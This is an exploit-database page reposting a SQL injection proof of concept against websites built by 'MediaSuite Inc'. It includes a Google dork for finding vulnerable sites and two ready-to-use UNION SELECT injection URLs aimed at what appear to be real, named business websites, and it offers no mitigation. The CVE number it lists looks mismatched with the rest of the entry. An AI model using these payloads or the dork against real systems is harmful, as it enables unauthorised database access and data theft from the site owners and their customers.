Advertisement






MediaSuite Inc - Sql Injection

CVE Category Price Severity
CVE-2021-39780 CWE-89 Not available High
Author Risk Exploitation Type Date
Pikabot High Remote 2023-12-26
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023120050

Below is a copy:

MediaSuite Inc - Sql Injection
*********************************************************
#Exploit Title: MediaSuite Inc - Sql Injection
#Date: 2023-12-25
#Exploit Author: Behrouz Mansoori
#Google Dork: "Website Designed by MediaSuite Inc."
#Category:webapps
#Tested On: Mac, Firefox
Proof of Concept:
### Demo :
view-source:https://www.simplycountryfurniture.ca/product.php?id=-7%20union%20select%20111111,22222,version(),44444,55555,6666,7777,8888,99999--
view-source:https://www.eminentgraphics.ca/product.php?id=-12%20union%20select%201111,2222,version(),4444,555,666,777,888,9999--
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.